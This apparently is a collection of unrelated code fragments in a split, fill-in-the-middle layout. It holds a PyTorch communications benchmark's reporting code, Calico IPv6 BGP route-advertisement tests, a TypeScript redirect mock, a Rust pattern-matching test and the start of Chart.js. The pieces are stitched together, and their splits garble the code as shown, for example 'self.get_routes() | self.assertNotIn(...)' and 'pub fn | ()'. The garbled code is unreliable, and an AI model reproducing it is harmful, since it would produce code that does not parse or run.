quant_p95 = np.percentile(quantLatencyAcrossRanks, 95)
dequant_p95 = np.percentile(dequantLatencyAcrossRanks, 95)
print(
"\tCOMMS-RES-QUANT\t{:>15}{:>18}{:>25}{:>15}{:>15}{:>15}".format(
results["memSize"],
str("%d" % (results["numElements"])),
str("%.1f" % (quant_p95)),
str("%.1f" % (p95 - quant_p95 - dequant_p95)),
str("%.1f" % (dequant_p95)),
str("%.1f" % (p95)),
# str("%.3f" % (algBW)),
# str("%.3f" % (busBW)),
)
)
def reportBenchTime(
self,
commsParams,
results,
tensorList,
quantTimeTensorList,
dequantTimeTensorList,
):
# convernt num_elements to # of elements per rank
if commsParams.collective in ("all_to_all", "all_to_allv"):
results["numElements"] = int(
results["numElements"] // commsParams.comms_world_info.world_size
)
if commsParams.collective == "pt2pt":
self.reportBenchTimePt2Pt(commsParams, tensorList, results)
elif commsParams.bitwidth < 32:
self.reportBenchTimeCollWithQuant(
commsParams,
results,
tensorList,
quantTimeTensorList,
dequantTimeTensorList,
)
else:
self.reportBenchTimeColl(commsParams, results, tensorList)
def reportBenchTimeColl(self, commsParams, results, tensorList):
if commsParams.backend == "xla":
latencyAcrossRanks = torch.transpose(tensorList.view(-1, 1), 0, 1)[0]
latencyAcrossRanks = latencyAcrossRanks.cpu().detach().numpy()
else:
if isinstance(tensorList, list):
tensorList = [t.cpu().detach().numpy() for t in tensorList]
latencyAcrossRanks = np.array(tensorList)
logger.debug(f"Latency across all ranks: {latencyAcrossRanks}")
# Include only communicating ranks
if self.collectiveArgs.collective == "multicast":
commRanks = [self.collectiveArgs.srcOrDst] + self.collectiveArgs.dst_ranks
elif self.collectiveArgs.collective == "incast":
commRanks = [self.collectiveArgs.srcOrDst] + self.collectiveArgs.src_ranks
else:
commRanks = range(self.collectiveArgs.world_size)
latencyAcrossCommRanks = latencyAcrossRanks[commRanks]
logger.debug(
"Latency across communicating ranks (%s): %s"
% (commRanks, latencyAcrossCommRanks)
)
p50 = np.percentile(latencyAcrossCommRanks, 50)
p75 = np.percentile(latencyAcrossCommRanks, 75)
p95 = np.percentile(latencyAcrossCommRanks, 95)
minlat = np.amin(latencyAcrossCommRanks)
maxlat = np.amax(latencyAcrossCommRanks)
# adjust busBW
busBW = results["busBW"] * (commsParams.bitwidth / 32.0)
if not self.collectiveArgs.pair:
print(
"\tCOMMS-RES{:>15}{:>18}{:>18}{:>12}{:>12}{:>12}{:>12}{:>15}{:>12}".format(
results["memSize"],
str("%d" % (results["numElements"])),
str("%.1f" % (p50)),
str("%.1f" % (p75)),
str("%.1f" % (p95)),
str("%.1f" % (minlat)),
str("%.1f" % (maxlat)),
str("%.3f" % (results["algBW"])),
str("%.3f" % (busBW)),
)
)
else:
# convernt to # of elements per rank
if commsParams.collective_pair in ("all_to_all", "all_to_allv"):
results["numElements_pair"] = int(
results["numElements_pair"]
// commsParams.comms_world_info.world_size
)
print(
"\tCOMMS-RES{:>15}{:>18}{:>22}{:>18}{:>12}{:>12}{:>12}{:>12}{:>15}{:>12}".format(
results["memSize"],
str("%d" % (results["numElements"])),
str("%d" % (results["numElements_pair"])),
str("%.1f" % (p50)),
str("%.1f" % (p75)),
str("%.1f" % (p95)),
str("%.1f" % (minlat)),
str("%.1f" % (maxlat)),
str("%.3f" % (results["algBW"])),
str("%.3f" % (busBW)),
)
)
def reportBenchTimePt2Pt(self, commsParams, resultsAcrossRanks, results):
pingLatencyAcrossRanks = []
pingPongLatencyAcrossRanks = []
uniBWAcrossRanks = []
biBWAcrossRanks = []
# idx = 0
for curRankTensor in resultsAcrossRanks:
pingLatencyAcrossRanks.append(curRankTensor[0].item())
pingPongLatencyAcrossRanks.append(curRankTensor[1].item())
uniBWAcrossRanks.append(curRankTensor[2].item())
biBWAcrossRanks.append(curRankTensor[3].item())
pingLatencyAcrossRanks = np.array(pingLatencyAcrossRanks)
pingPongLatencyAcrossRanks = np.array(pingPongLatencyAcrossRanks)
uniBWAcrossRanks = np.array(uniBWAcrossRanks)
biBWAcrossRanks = np.array(biBWAcrossRanks)
# Include only communicating ranks
commRanks = self.collectiveArgs.src_ranks + self.collectiveArgs.dst_ranks
pingLatencyAcrossCommRanks = pingLatencyAcrossRanks[commRanks]
pingPongLatencyAcrossCommRanks = pingPongLatencyAcrossRanks[commRanks]
uniBWAcrossCommRanks = uniBWAcrossRanks[commRanks]
biBWAcrossCommRanks = biBWAcrossRanks[commRanks]
logger.debug(
"Ping latency across communicating ranks (%s): %s"
% (commRanks, pingLatencyAcrossCommRanks)
)
logger.debug(
"PingPong latency across communicating ranks (%s): %s"
% (commRanks, pingPongLatencyAcrossCommRanks)
)
logger.debug(
"UniBW across all communicating ranks (%s): %s"
% (commRanks, uniBWAcrossCommRanks)
)
logger.debug(
"BiBW across all communicating ranks (%s): %s"
% (commRanks, biBWAcrossCommRanks)
)
avgUniBW = np.mean(uniBWAcrossCommRanks)
avgBiBW = np.mean(biBWAcrossCommRanks)
totalUniBW = np.sum(uniBWAcrossCommRanks) / 2
totalBiBW = np.sum(biBWAcrossCommRanks) / 2
ping_p50 = np.percentile(pingLatencyAcrossCommRanks, 50)
ping_p75 = np.percentile(pingLatencyAcrossCommRanks, 75)
ping_p95 = np.percentile(pingLatencyAcrossCommRanks, 95)
ping_pong_p50 = np.percentile(pingPongLatencyAcrossCommRanks, 50)
ping_pong_p75 = np.percentile(pingPongLatencyAcrossCommRanks, 75)
ping_pong_p95 = np.percentile(pingPongLatencyAcrossCommRanks, 95)
print(
"\tCOMMS-RES{:>15}{:>20}{:>10}{:>10}{:>25}{:>10}{:>10}{:>15}{:>15}{:>18}{:>18}".format(
results["memSize"],
str("%.1f" % (ping_p50)),
str("%.1f" % (ping_p75)),
str("%.1f" % (ping_p95)),
str("%.1f" % (ping_pong_p50)),
str("%.1f" % (ping_pong_p75)),
str("%.1f" % (ping_pong_p95)),
str("%.3f" % (avgUniBW)),
str("%.3f" % (avgBiBW)),
str("%.3f" % (totalUniBW)),
str("%.3f" % (totalBiBW)),
)
)
def benchTime(self, index, commsParams, backendFuncs):
# Get NW stack specific parameters
(
local_rank,
global_rank,
world_size,
group,
curDevice,
curHwDevice,
allSizes,
computeFunc,
) = self.initCollectiveArgs(commsParams)
backendFuncs.sync_barrier(self.collectiveArgs)
if global_rank == 0:
self.printPreamble(commsParams)
for curSize in allSizes:
results = {}
timeUsElapsedList = []
quantTimeElapsedList = []
dequantTimeElapsedList = []
numElements = int(curSize // commsParams.element_size)
collectiveFunc = self.backendFuncs.noop
collectiveFunc_pair = self.backendFuncs.noop
if (
commsParams.mode != "compute"
): # comms specific initializations if not in compute-only mode
# set corresponding function pointers
if commsParams.collective != "pt2pt":
collectiveFunc = backendFuncs.collectiveFunc[commsParams.collective]
(
self.collectiveArgs.ipTensor,
self.collectiveArgs.opTensor,
) = self.prepComm(
curComm={
"in_msg_size": numElements,
"out_msg_size": numElements,
"world_size": world_size,
},
commsParams=commsParams,
)
# Setup the arguments.
self.collectiveArgs.dataSize = curSize
self.collectiveArgs.numElements = numElements
self.collectiveArgs.waitObj = []
results["numElements"] = numElements
if (
commsParams.pair and commsParams.mode != "compute"
): # comms-pair specific initializations if not in compute-only mode:
# set corresponding function pointers
collectiveFunc_pair = backendFuncs.collectiveFunc[
commsParams.collective_pair
]
# TODO: allow user to set specific size
# Setup the arguments.
self.collectiveArgs.dataSize_pair = curSize
self.collectiveArgs.numElements_pair = int(
self.collectiveArgs.dataSize_pair // commsParams.element_size
)
results["numElements_pair"] = self.collectiveArgs.numElements_pair
(
self.collectiveArgs.ipTensor_pair,
self.collectiveArgs.opTensor_pair,
) = self.prepComm(
curComm={
"in_msg_size": self.collectiveArgs.numElements_pair,
"out_msg_size": self.collectiveArgs.numElements_pair,
"world_size": world_size,
},
commsParams=commsParams,
)
# self.collectiveArgs has all the information on the experiment.
if commsParams.collective == "pt2pt":
results.update(self.runPt2Pt())
timeUsElapsedList = [
np.mean(np.array(results["pingPerIterNS"])) / 1e3,
np.mean(np.array(results["pingPongPerIterNS"])) / 1e3,
results["avgUniBW"],
results["avgBiBW"],
] # time in US
if (
global_rank in self.collectiveArgs.src_ranks
or global_rank in self.collectiveArgs.dst_ranks
):
logger.debug(timeUsElapsedList)
else:
results.update(
self.runColl(
comm_fn=collectiveFunc,
compute_fn=computeFunc,
comm_fn_pair=collectiveFunc_pair,
)
)
timeUsElapsedList = [results["timeUS"]]
# perfom data validation check on the final opTensor
if commsParams.dcheck == 1:
self.dcheck(commsParams, curSize, self.collectiveArgs.opTensor)
backendFuncs.clear_memory(self.collectiveArgs)
# gather quantization overhead if enabled
if commsParams.bitwidth < 32:
# calculate average (de-)quantization overhead
results["quantTimeUS"] = (
self.collectiveArgs.quant_time.getTimeUS()
/ self.collectiveArgs.numIters
)
results["dequantTimeUS"] = (
self.collectiveArgs.dequant_time.getTimeUS()
/ self.collectiveArgs.numIters
)
quantTimeElapsedList.append(results["quantTimeUS"])
dequantTimeElapsedList.append(results["dequantTimeUS"])
logger.debug(quantTimeElapsedList)
quantTimeElapsedList = self.gatherBenchTime(
self.collectiveArgs, commsParams, quantTimeElapsedList
)
dequantTimeElapsedList = self.gatherBenchTime(
self.collectiveArgs, commsParams, dequantTimeElapsedList
)
# gather and report performance to stdout
tensorList = self.gatherBenchTime(
self.collectiveArgs, commsParams, timeUsElapsedList
)
if global_rank == 0:
self.reportBenchTime(
commsParams,
results,
tensorList,
quantTimeElapsedList,
dequantTimeElapsedList,
)
self.backendFuncs.sync_barrier(
self.collectiveArgs, desc=f"curSize_{curSize}"
)
comms_utils.clearQuantCommCtx(self.collectiveArgs)
# wait rank 0 reports results to avoid other ranks mess up the output
self.backendFuncs.sync_barrier(self.collectiveArgs, "benchtime")
def runBench(self, comms_world_info, commsParams):
# Init the desired backend
if commsParams.nw_stack == "pytorch-dist":
from pytorch_dist_backend import PyTorchDistBackend
backendObj = PyTorchDistBackend(comms_world_info, commsParams)
elif commsParams.nw_stack == "pytorch-xla-tpu":
from pytorch_tpu_backend import PyTorchTPUBackend
backendObj = PyTorchTPUBackend(comms_world_info, commsParams)
else:
logger.error("Unsupported NW stack! ")
comms_utils.gracefulExit()
self.backendFuncs = backendObj
try:
backendObj.benchmark_comms()
except ValueError as ve:
if commsParams.backend == "ucc":
logger.critical("PyTorch UCC not implemented? {}".format(repr(ve)))
raise
def main():
collBenchObj = commsCollBench()
### parse arguments ###
parser = argparse.ArgumentParser(
description="PARAM-Comm Benchmark",
formatter_class=MultilineFormatter,
)
args, leftovers = collBenchObj.readArgs(parser)
collBenchObj.checkArgs(args)
comms_env_params = comms_utils.read_comms_env_vars()
if comms_env_params["global_rank"] == 0:
print("\t MPI environment: %s " % (str(comms_env_params)))
print(
"\t backend: %s nw-stack: %s mode: %s args.b: %d args.e: %d args.f: %d args.z: %s args.master_ip: %s "
% (
args.backend,
args.nw_stack,
args.mode,
args.b,
args.e,
args.f,
args.z,
args.master_ip,
)
)
element_size = torch.ones([1], dtype=args.dtype).element_size()
comms_world_info = comms_utils.comms_world_info_holder(
args.master_ip, args.master_port, args.num_tpu_cores, comms_env_params
)
commsParams = comms_utils.commsParamsHolder(
args, comms_world_info, element_size, collBenchObj.benchTime
)
if args.pair and args.overlap_pair_pgs:
commsParams.num_pgs = 2
collBenchObj.runBench(comms_world_info, commsParams)
if __name__ == "__main__":
main()
| getUniBW |
test_bgp_advert_v6.py | # Copyright (c) 2020 Tigera, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import subprocess
import json
import sys
from tests.k8st.test_base import TestBaseV6
from tests.k8st.utils.utils import start_external_node_with_bgp, \
retry_until_success, run, curl, DiagsCollector, calicoctl, kubectl, node_info
_log = logging.getLogger(__name__)
attempts = 10
bird_conf = """
# Template for all BGP clients
template bgp bgp_template {
debug { states };
description "Connection to BGP peer";
local as 64512;
multihop;
gateway recursive; # This should be the default, but just in case.
import all; # Import all routes, since we don't know what the upstream
# topology is and therefore have to trust the ToR/RR.
export all;
source address ip@local; # The local address we use for the TCP connection
add paths on;
graceful restart; # See comment in kernel section about graceful restart.
connect delay time 2;
connect retry time 5;
error wait time 5,30;
}
# ------------- Node-to-node mesh -------------
protocol bgp Mesh_with_master_node from bgp_template {
neighbor %s as 64512;
passive on; # Mesh is unidirectional, peer will connect to us.
}
protocol bgp Mesh_with_node_1 from bgp_template {
neighbor %s as 64512;
passive on; # Mesh is unidirectional, peer will connect to us.
}
protocol bgp Mesh_with_node_2 from bgp_template {
neighbor %s as 64512;
passive on; # Mesh is unidirectional, peer will connect to us.
}
protocol bgp Mesh_with_node_3 from bgp_template {
neighbor %s as 64512;
passive on; # Mesh is unidirectional, peer will connect to us.
}
"""
# BIRD config for an external node to peer with
# the in-cluster route reflector on kube-node-2.
bird_conf_rr = """
# Template for all BGP clients
template bgp bgp_template {
debug { states };
description "Connection to BGP peer";
local as 64512;
multihop;
gateway recursive; # This should be the default, but just in case.
import all; # Import all routes, since we don't know what the upstream
# topology is and therefore have to trust the ToR/RR.
export all;
source address ip@local; # The local address we use for the TCP connection
add paths on;
graceful restart; # See comment in kernel section about graceful restart.
connect delay time 2;
connect retry time 5;
error wait time 5,30;
}
protocol bgp Mesh_with_node_2 from bgp_template {
neighbor %s as 64512;
passive on; # Mesh is unidirectional, peer will connect to us.
}
"""
class _TestBGPAdvertV6(TestBaseV6):
def setUp(self):
super(_TestBGPAdvertV6, self).setUp()
# Create bgp test namespace
self.ns = "bgp-test"
self.create_namespace(self.ns)
self.nodes, self.ipv4s, self.ipv6s = node_info()
self.external_node_ip = start_external_node_with_bgp(
"kube-node-extra",
bird6_peer_config=self.get_bird_conf(),
)
# Enable debug logging
self.update_ds_env("calico-node",
"kube-system",
{"BGP_LOGSEVERITYSCREEN": "debug"})
# Establish BGPPeer from cluster nodes to node-extra
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPPeer
metadata:
name: node-extra.peer%s
EOF
""" % self.get_extra_peer_spec())
def tearDown(self):
super(_TestBGPAdvertV6, self).tearDown()
self.delete_and_confirm(self.ns, "ns")
try:
# Delete the extra node.
run("docker rm -f kube-node-extra")
except subprocess.CalledProcessError:
pass
# Delete BGPPeers.
calicoctl("delete bgppeer node-extra.peer", allow_fail=True)
calicoctl("delete bgppeer peer-with-rr", allow_fail=True)
# Restore node-to-node mesh.
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPConfiguration
metadata: {name: default}
spec:
nodeToNodeMeshEnabled: true
asNumber: 64512
EOF
""")
# Remove node-2's route-reflector config.
json_str = calicoctl("get node %s -o json" % self.nodes[2])
node_dict = json.loads(json_str)
node_dict['metadata']['labels'].pop('i-am-a-route-reflector', '')
node_dict['spec']['bgp'].pop('routeReflectorClusterID', '')
calicoctl("""apply -f - << EOF
%s
EOF
""" % json.dumps(node_dict))
def get_svc_cluster_ip(self, svc, ns):
return kubectl("get svc %s -n %s -o json | jq -r .spec.clusterIP" %
(svc, ns)).strip()
def assert_ecmp_routes(self, dst, via):
matchStr = dst + " proto bird metric 1024 pref medium"
# sort ips and construct match string for ECMP routes.
for ip in sorted(via):
matchStr += "\n\tnexthop via %s dev eth0 weight 1 " % ip
retry_until_success(lambda: self.assertIn(matchStr, self.get_routes()))
def get_svc_host_ipv6(self, svc, ns):
ipv4 = kubectl("get po -l app=%s -n %s -o json | jq -r .items[0].status.hostIP" %
(svc, ns)).strip()
for i in range(len(self.ipv4s)):
if ipv4 == self.ipv4s[i]:
return self.ipv6s[i]
assert False
def add_svc_external_ips(self, svc, ns, ips):
ipsStr = ','.join('"{0}"'.format(ip) for ip in ips)
patchStr = "{\"spec\": {\"externalIPs\": [%s]}}" % (ipsStr)
return kubectl("patch svc %s -n %s --patch '%s'" % (svc, ns, patchStr)).strip()
class TestBGPAdvertV6(_TestBGPAdvertV6):
# In the tests of this class we have a full BGP mesh between the
# cluster nodes (kube-control-plane, kube-node-1 and kube-node-2)
# and the external node (kube-node-extra):
#
# - The full mesh between the cluster nodes is configured by
# nodeToNodeMeshEnabled: true.
#
# - The peerings from each cluster node to the external node are
# configured by self.get_extra_peer_spec().
#
# - The peerings from the external node to each cluster node are
# configured by self.get_bird_conf().
def get_bird_conf(self):
return bird_conf % (self.ipv6s[0], self.ipv6s[1],
self.ipv6s[2], self.ipv6s[3])
def get_extra_peer_spec(self):
return """
spec:
peerIP: %s
asNumber: 64512
""" % self.external_node_ip
def test_cluster_ip_advertisement(self):
"""
Runs the tests for service cluster IPv6 advertisement
- Create both a Local and a Cluster type NodePort service with a single replica.
- assert only local and cluster CIDR routes are advertised.
- assert /128 routes are used, source IP is preserved.
- Scale the Local NP service so it is running on multiple nodes, assert ECMP routing, source IP is preserved.
- Delete both services, assert only cluster CIDR route is advertised.
"""
with DiagsCollector():
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPConfiguration
metadata:
name: default
spec:
serviceClusterIPs:
- cidr: fd00:10:96::/112
EOF
""")
# Assert that a route to the service IP range is present.
retry_until_success(lambda: self.assertIn("fd00:10:96::/112", self.get_routes()))
# Create both a Local and a Cluster type NodePort service with a single replica.
local_svc = "nginx-local"
cluster_svc = "nginx-cluster"
self.deploy("gcr.io/kubernetes-e2e-test-images/test-webserver:1.0", local_svc, self.ns, 80, ipv6=True)
self.deploy("gcr.io/kubernetes-e2e-test-images/test-webserver:1.0", cluster_svc, self.ns, 80, traffic_policy="Cluster", ipv6=True)
self.wait_until_exists(local_svc, "svc", self.ns)
self.wait_until_exists(cluster_svc, "svc", self.ns)
# Get clusterIPs.
local_svc_ip = self.get_svc_cluster_ip(local_svc, self.ns)
cluster_svc_ip = self.get_svc_cluster_ip(cluster_svc, self.ns)
# Wait for the deployments to roll out.
self.wait_for_deployment(local_svc, self.ns)
self.wait_for_deployment(cluster_svc, self.ns)
# Assert that both nginx service can be curled from the external node.
retry_until_success(curl, function_args=[local_svc_ip])
retry_until_success(curl, function_args=[cluster_svc_ip])
# Assert that local clusterIP is an advertised route and cluster clusterIP is not.
retry_until_success(lambda: self.assertIn(local_svc_ip, self.get_routes()))
retry_until_success(lambda: self.assertNotIn(cluster_svc_ip, self.get_routes()))
# TODO: This assertion is actually incorrect. Kubernetes performs
# SNAT on all traffic destined to a service ClusterIP that doesn't
# originate from within the cluster's pod CIDR. This assertion
# pass for External / LoadBalancer IPs, though.
#
# Create a network policy that only accepts traffic from the external node.
# Applying this policy asserts that traffic is not being SNAT'd by kube-proxy
# when it reaches the destination node.
# kubectl("""apply -f - << EOF
# apiVersion: networking.k8s.io/v1
# kind: NetworkPolicy
# metadata:
# name: allow-tcp-80-ex
# namespace: bgp-test
# spec:
# podSelector: {}
# policyTypes:
# - Ingress
# ingress:
# - from:
# - ipBlock: { cidr: %s/128 }
# ports:
# - protocol: TCP
# port: 80
# EOF
# """ % self.external_node_ip)
# Connectivity to nginx-local should always succeed.
for i in range(attempts):
retry_until_success(curl, retries=200, wait_time=5, function_args=[local_svc_ip])
# NOTE: Unlike in the IPv6 case (in test_bgp_advert.py) we cannot successfully test that
# connectivity to nginx-cluster is load-balanced across all nodes (and hence, with the
# above policy in place, will sometimes fail and sometimes succeed), because our current
# observation is that Linux's IPv6 ECMP route choice does _not_ depend on source port,
# even though it is documented as such when fib_multipath_hash_policy == 1.
# Scale the local_svc to 4 replicas
self.scale_deployment(local_svc, self.ns, 4)
self.wait_for_deployment(local_svc, self.ns)
self.assert_ecmp_routes(local_svc_ip, [self.ipv6s[1], self.ipv6s[2], self.ipv6s[3]])
for i in range(attempts):
retry_until_success(curl, function_args=[local_svc_ip])
# Delete both services.
self.delete_and_confirm(local_svc, "svc", self.ns)
self.delete_and_confirm(cluster_svc, "svc", self.ns)
# Assert that clusterIP is no longer an advertised route.
retry_until_success(lambda: self.assertNotIn(local_svc_ip, self.get_routes()))
def test_external_ip_advertisement(self):
"""
Runs the tests for service external IPv6 advertisement
"""
with DiagsCollector():
# Whitelist two IP ranges for the external IPs we'll test with
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPConfiguration
metadata:
name: default
spec:
serviceExternalIPs:
- cidr: fd5f:1234:175:200::/112
- cidr: fd5f:1234:200:255::/120
EOF
""")
# Create both a Local and a Cluster type NodePort service with a single replica.
local_svc = "nginx-local"
cluster_svc = "nginx-cluster"
self.deploy("gcr.io/kubernetes-e2e-test-images/test-webserver:1.0", local_svc, self.ns, 80, ipv6=True)
self.deploy("gcr.io/kubernetes-e2e-test-images/test-webserver:1.0", cluster_svc, self.ns, 80, traffic_policy="Cluster", ipv6=True)
self.wait_until_exists(local_svc, "svc", self.ns)
self.wait_until_exists(cluster_svc, "svc", self.ns)
# Get clusterIPs.
local_svc_ip = self.get_svc_cluster_ip(local_svc, self.ns)
cluster_svc_ip = self.get_svc_cluster_ip(cluster_svc, self.ns)
# Wait for the deployments to roll out.
self.wait_for_deployment(local_svc, self.ns)
self.wait_for_deployment(cluster_svc, self.ns)
# Assert that clusterIPs are not advertised.
retry_until_success(lambda: self.assertNotIn(local_svc_ip, self.get_routes()))
retry_until_success(lambda: self.assertNotIn(cluster_svc_ip, self.get_routes()))
# Create a network policy that only accepts traffic from the external node.
kubectl("""apply -f - << EOF
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: allow-tcp-80-ex
namespace: bgp-test
spec:
podSelector: {}
policyTypes:
- Ingress
ingress:
- from:
- ipBlock: { cidr: %s/32 }
ports:
- protocol: TCP
port: 80
EOF
""" % self.external_node_ip)
# Get host IPs for the nginx pods.
local_svc_host_ip = self.get_svc_host_ipv6(local_svc, self.ns)
cluster_svc_host_ip = self.get_svc_host_ipv6(cluster_svc, self.ns)
# Select an IP from each external IP CIDR.
local_svc_external_ip = "fd5f:1234:175:200::1"
cluster_svc_external_ip = "fd5f:1234:200:255::1"
# Add external IPs to the two services.
self.add_svc_external_ips(local_svc, self.ns, [local_svc_external_ip])
self.add_svc_external_ips(cluster_svc, self.ns, [cluster_svc_external_ip])
# Verify that external IPs for local service is advertised but not the cluster service.
local_svc_externalips_route = "%s via %s" % (local_svc_external_ip, local_svc_host_ip)
cluster_svc_externalips_route = "%s via %s" % (cluster_svc_external_ip, cluster_svc_host_ip)
retry_until_success(lambda: self.assertIn(local_svc_externalips_route, self.get_routes()))
retry_until_success(lambda: self.assertNotIn(cluster_svc_externalips_route, self.get_routes()))
# Scale the local_svc to 4 replicas.
self.scale_deployment(local_svc, self.ns, 4)
self.wait_for_deployment(local_svc, self.ns)
# Verify that we have ECMP routes for the external IP of the local service.
retry_until_success(lambda: self.assert_ecmp_routes(local_svc_external_ip, [self.ipv6s[1], self.ipv6s[2], self.ipv6s[3]]))
# Delete both services, assert only cluster CIDR route is advertised.
self.delete_and_confirm(local_svc, "svc", self.ns)
self.delete_and_confirm(cluster_svc, "svc", self.ns)
# Assert that external IP is no longer an advertised route.
retry_until_success(lambda: self.assertNotIn(local_svc_externalips_route, self.get_routes()))
def test_many_services(self):
"""
Creates a lot of IPv6 services quickly
"""
with DiagsCollector():
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPConfiguration
metadata:
name: default
spec:
serviceClusterIPs:
- cidr: fd00:10:96::/112
EOF
""")
# Assert that a route to the service IP range is present.
retry_until_success(lambda: self.assertIn("fd00:10:96::/112", self.get_routes()))
# Create a local service and deployment.
local_svc = "nginx-local"
self.deploy("gcr.io/kubernetes-e2e-test-images/test-webserver:1.0", local_svc, self.ns, 80, ipv6=True)
self.wait_for_deployment(local_svc, self.ns)
# Get clusterIPs.
cluster_ips = []
cluster_ips.append(self.get_svc_cluster_ip(local_svc, self.ns))
# Create many more services which select this deployment.
num_svc = 300
for i in range(num_svc):
name = "nginx-svc-%s" % i
self.create_service(name, local_svc, self.ns, 80, ipv6=True)
# Get all of their IPs.
for i in range(num_svc):
name = "nginx-svc-%s" % i
cluster_ips.append(self.get_svc_cluster_ip(name, self.ns))
# Assert they are all advertised to the other node. This should happen
# quickly enough that by the time we have queried all services from
# the k8s API, they should be programmed on the remote node.
def check_routes_advertised():
routes = self.get_routes()
for cip in cluster_ips:
self.assertIn(cip, routes)
retry_until_success(check_routes_advertised, retries=3, wait_time=5)
# Scale to 0 replicas, assert all routes are removed.
self.scale_deployment(local_svc, self.ns, 0)
self.wait_for_deployment(local_svc, self.ns)
def check_routes_gone():
routes = self.get_routes() | self.assertNotIn(cip, routes)
retry_until_success(check_routes_gone, retries=10, wait_time=5)
class TestBGPAdvertV6RR(_TestBGPAdvertV6):
# In the tests of this class, kube-node-2 acts as an RR, and all
# the other nodes peer with it. Here are the peerings that we
# need for that:
#
# RR
# kube-master kube-node-1 kube-node-2 kube-node-extra
# 2001:20::8 2001:20::1 2001:20::2 2001:20::20
# | | | | | |
# | +---------+ | +---------+
# +----------------------------+ Peering -> is configured
# These peerings are by get_extra_peer_spec().
# configured by BGPPeer Peering <- is configured
# peer-with-rr in get_bird_conf().
def get_bird_conf(self):
return bird_conf_rr % self.ipv6s[2]
def get_extra_peer_spec(self):
return """
spec:
node: %s
peerIP: %s
asNumber: 64512
""" % (self.nodes[2], self.external_node_ip)
def test_rr(self):
# Create ExternalTrafficPolicy Local service with one endpoint on node-1
kubectl("""apply -f - << EOF
apiVersion: apps/v1
kind: Deployment
metadata:
name: nginx-rr
namespace: bgp-test
labels:
app: nginx
spec:
replicas: 1
selector:
matchLabels:
app: nginx
run: nginx-rr
template:
metadata:
labels:
app: nginx
run: nginx-rr
spec:
containers:
- name: nginx-rr
image: nginx:1.7.9
ports:
- containerPort: 80
nodeSelector:
beta.kubernetes.io/os: linux
kubernetes.io/hostname: %s
---
apiVersion: v1
kind: Service
metadata:
name: nginx-rr
namespace: bgp-test
labels:
app: nginx
run: nginx-rr
spec:
ipFamilies:
- IPv6
externalIPs:
- fd5f:1234:175:200::1
ports:
- port: 80
targetPort: 80
selector:
app: nginx
run: nginx-rr
type: NodePort
externalTrafficPolicy: Local
EOF
""" % self.nodes[1])
calicoctl("get nodes -o yaml")
calicoctl("get bgppeers -o yaml")
calicoctl("get bgpconfigs -o yaml")
# Update the node-2 to behave as a route-reflector
json_str = calicoctl("get node %s -o json" % self.nodes[2])
node_dict = json.loads(json_str)
node_dict['metadata']['labels']['i-am-a-route-reflector'] = 'true'
node_dict['spec']['bgp']['routeReflectorClusterID'] = '224.0.0.1'
calicoctl("""apply -f - << EOF
%s
EOF
""" % json.dumps(node_dict))
# Disable node-to-node mesh, add cluster and external IP CIDRs to
# advertise, and configure BGP peering between the cluster nodes and the
# RR. (The BGP peering from the external node to the RR is included in
# get_bird_conf() above.)
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPConfiguration
metadata:
name: default
spec:
nodeToNodeMeshEnabled: false
asNumber: 64512
serviceClusterIPs:
- cidr: fd00:10:96::/112
serviceExternalIPs:
- cidr: fd5f:1234:175:200::/112
EOF
""")
calicoctl("""apply -f - << EOF
apiVersion: projectcalico.org/v3
kind: BGPPeer
metadata: {name: peer-with-rr}
spec:
peerIP: %s
asNumber: 64512
EOF
""" % self.ipv6s[2])
svc_json = kubectl("get svc nginx-rr -n bgp-test -o json")
svc_dict = json.loads(svc_json)
cluster_ip = svc_dict['spec']['clusterIP']
external_ip = svc_dict['spec']['externalIPs'][0]
retry_until_success(lambda: self.assertIn(cluster_ip, self.get_routes()))
retry_until_success(lambda: self.assertIn(external_ip, self.get_routes())) | for cip in cluster_ips: |
redirect.mock.ts | import { Consumer } from "../../consumer/entity/consumer.entity";
| }
} | export class MockRedirectRepository {
public url(redirect_url: string, consumer: Consumer) {
expect(redirect_url).toEqual("test123.com");
expect(consumer).toBeInstanceOf(Consumer); |
borrowed-ptr-pattern-option.rs | // Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
fn select(x: &r/Option<int>, y: &r/Option<int>) -> &r/Option<int> {
match (x, y) {
(&None, &None) => x,
(&Some(_), _) => x,
(&None, &Some(_)) => y
}
}
pub fn | () {
let x = None;
let y = Some(3);
assert select(&x, &y).get() == 3;
} | main |
Chart.js | /*!
* Chart.js
* http://chartjs.org/
* Version: 2.4.0
*
* Copyright 2016 Nick Downie
* Released under the MIT license
* https://github.com/chartjs/Chart.js/blob/master/LICENSE.md
*/
(function (f) {
if (typeof exports === "object" && typeof module !== "undefined") {
module.exports = f()
} else if (typeof define === "function" && define.amd) {
define([], f)
} else {
var g;
if (typeof window !== "undefined") {
g = window
} else if (typeof global !== "undefined") {
g = global
} else if (typeof self !== "undefined") {
g = self
} else {
g = this
}
g.Chart = f()
}
})(function () {
var define, module, exports;
return (function e(t, n, r) {
function s(o, u) {
if (!n[o]) {
if (!t[o]) {
var a = typeof require == "function" && require;
if (!u && a)return a(o, !0);
if (i)return i(o, !0);
var f = new Error("Cannot find module '" + o + "'");
throw f.code = "MODULE_NOT_FOUND", f
}
var l = n[o] = {exports: {}};
t[o][0].call(l.exports, function (e) {
var n = t[o][1][e];
return s(n ? n : e)
}, l, l.exports, e, t, n, r)
}
return n[o].exports
}
